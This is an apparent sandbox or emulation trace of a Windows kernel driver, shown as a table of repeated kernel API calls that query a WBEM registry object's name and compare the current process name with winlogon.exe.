| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
